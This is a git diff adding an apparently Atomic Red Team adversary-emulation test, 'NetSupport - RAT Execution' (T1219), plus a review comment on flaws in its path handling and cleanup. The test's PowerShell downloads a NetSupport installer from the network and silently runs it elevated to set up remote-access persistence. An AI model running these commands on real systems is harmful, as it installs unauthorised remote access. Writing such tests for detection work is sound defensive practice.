diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 482b0528..c60142c3 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -1185,6 +1185,7 @@ command-and-control,T1219,Remote Access Software,4,GoToAssist Files Detected Tes
command-and-control,T1219,Remote Access Software,5,ScreenConnect Application Download and Install on Windows,4a18cc4e-416f-4966-9a9d-75731c4684c0,powershell
command-and-control,T1219,Remote Access Software,6,Ammyy Admin Software Execution,0ae9e327-3251-465a-a53b-485d4e3f58fa,powershell
command-and-control,T1219,Remote Access Software,7,RemotePC Software Execution,fbff3f1f-b0bf-448e-840f-7e1687affdce,powershell
+command-and-control,T1219,Remote Access Software,8,NetSupport - RAT Execution,ecca999b-e0c8-40e8-8416-ad320b146a75,powershell
command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell
command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell
command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 6967ae8f..578c39c2 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -860,6 +860,7 @@ command-and-control,T1219,Remote Access Software,4,GoToAssist Files Detected Tes
command-and-control,T1219,Remote Access Software,5,ScreenConnect Application Download and Install on Windows,4a18cc4e-416f-4966-9a9d-75731c4684c0,powershell
command-and-control,T1219,Remote Access Software,6,Ammyy Admin Software Execution,0ae9e327-3251-465a-a53b-485d4e3f58fa,powershell
command-and-control,T1219,Remote Access Software,7,RemotePC Software Execution,fbff3f1f-b0bf-448e-840f-7e1687affdce,powershell
+command-and-control,T1219,Remote Access Software,8,NetSupport - RAT Execution,ecca999b-e0c8-40e8-8416-ad320b146a75,powershell
command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell
command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell
command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 46af6a54..36b04a9e 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -1995,6 +1995,7 @@
- Atomic Test #5: ScreenConnect Application Download and Install on Windows [windows]
- Atomic Test #6: Ammyy Admin Software Execution [windows]
- Atomic Test #7: RemotePC Software Execution [windows]
+ - Atomic Test #8: NetSupport - RAT Execution [windows]
- T1079 Multilayer Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 8d45c717..ee67c693 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -1440,6 +1440,7 @@
- Atomic Test #5: ScreenConnect Application Download and Install on Windows [windows]
- Atomic Test #6: Ammyy Admin Software Execution [windows]
- Atomic Test #7: RemotePC Software Execution [windows]
+ - Atomic Test #8: NetSupport - RAT Execution [windows]
- T1079 Multilayer Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 3263a033..d8e1930c 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -87541,6 +87541,41 @@ command-and-control:
-Name \"RPCService\" -force -erroraction silentlycontinue\n"
name: powershell
elevation_required: true
+ - name: NetSupport - RAT Execution
+ auto_generated_guid: ecca999b-e0c8-40e8-8416-ad320b146a75
+ description: "A recent trend by threat actors, once a foothold is established,
+ maintain long term persistence using third party remote services such as NetSupport
+ to provide the operator with access to the network using legitimate services.
+ \n"
+ supported_platforms:
+ - windows
+ input_arguments:
+ NetSupport_Path:
+ description: Path to the NetSupport executable.
+ type: Path
+ default: "$env:temp\\T1219Setup.exe"
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'NetSupport must be downloaded and exist on the disk at the specified
+ location. (#{NetSupport_Path})
+
+ '
+ prereq_command: 'if (Test-Path #{NetSupport_Path}) {exit 0} else {exit 1}
+
+ '
+ get_prereq_command: 'Start-BitsTransfer -Source "https://nsproducts.azureedge.net/nsm-1270/en/Setup.exe"
+ -Destination "$env:temp\T1219Setup.exe" -dynamic
+
+ '
+ executor:
+ command: 'Start-Process #{NetSupport_Path} -ArgumentList "/S /v/qn"
+
+ '
+ cleanup_command: 'Stop-Process -Name "client32" -force -erroraction silentlycontinue
+
+ '
+ name: powershell
+ elevation_required: true
T1079:
technique:
x_mitre_platforms:
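Review bot: The `get_prereq_command` writes to a fixed `$env:temp\T1219Setup.exe` instead of the input argument, so when `NetSupport_Path` is overridden the download lands where `prereq_command` never looks and the executor starts a file that is not there; use `-Destination "#{NetSupport_Path}"`. `#{NetSupport_Path}` is also unquoted in `Test-Path` and `Start-Process`, which breaks on a path containing spaces. The `cleanup_command` only stops `client32`, so whatever the silent install placed on the host, plus the downloaded installer, stays behind after cleanup; an uninstall step and a `Remove-Item "#{NetSupport_Path}"` would return the test machine to its prior state instead of leaving remote-access software installed. The installer is fetched and then run elevated with no integrity check, so comparing `Get-FileHash` output against a pinned SHA-256 in the prereq step would be worth adding. The same commands are rendered in the T1219.md hunk, and since this index appears to be generated, the change presumably belongs in the test's source definition.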
diff --git a/atomics/T1219/T1219.md b/atomics/T1219/T1219.md
index e06e531b..9fe4211e 100644
--- a/atomics/T1219/T1219.md
+++ b/atomics/T1219/T1219.md
@@ -22,6 +22,8 @@ Admin tools such as TeamViewer have been used by several groups targeting instit
- [Atomic Test #7 - RemotePC Software Execution](#atomic-test-7---remotepc-software-execution)
+- [Atomic Test #8 - NetSupport - RAT Execution](#atomic-test-8---netsupport---rat-execution)
+
@@ -311,4 +313,53 @@ Start-BitsTransfer -Source "https://static.remotepc.com/downloads/rpc/140422/Rem
+
+
+
+## Atomic Test #8 - NetSupport - RAT Execution
+A recent trend by threat actors, once a foothold is established, maintain long term persistence using third party remote services such as NetSupport to provide the operator with access to the network using legitimate services.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** ecca999b-e0c8-40e8-8416-ad320b146a75
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| NetSupport_Path | Path to the NetSupport executable. | Path | $env:temp\T1219Setup.exe|
+
+
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
+
+
+```powershell
+Start-Process #{NetSupport_Path} -ArgumentList "/S /v/qn"
+```
+
+#### Cleanup Commands:
+```powershell
+Stop-Process -Name "client32" -force -erroraction silentlycontinue
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: NetSupport must be downloaded and exist on the disk at the specified location. (#{NetSupport_Path})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{NetSupport_Path}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Start-BitsTransfer -Source "https://nsproducts.azureedge.net/nsm-1270/en/Setup.exe" -Destination "$env:temp\T1219Setup.exe" -dynamic
+```
+
+
+
+